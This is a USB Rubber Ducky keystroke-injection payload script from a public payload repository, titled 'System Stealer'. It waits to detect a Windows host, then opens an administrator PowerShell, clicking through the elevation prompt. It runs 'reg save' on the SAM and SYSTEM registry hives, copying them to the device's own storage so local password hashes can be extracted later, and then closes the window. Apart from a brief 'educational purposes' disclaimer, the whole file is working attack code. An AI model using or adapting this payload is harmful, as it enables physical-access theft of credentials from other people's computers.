GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/System-Stealer/payload.txt
REM TITLE System Stealer
REM AUTHOR mavisinator30001
REM DESCRIPTION Creates two files on the Duck's storage, sam.save and system.save, each containing encrypted system information
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
REM DISCLAIMER This is for educational purposes ONLY
DELAY 1000
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Fully passive Windows OS detection with a passive detect-ready wait
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at the beginning of the payload (directly after ATTACKMODE) to act as a dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See the end of this extension for an example of using $_OS within the payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Change #DRIVELABEL below to the volume label of your Duck's storage partition
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF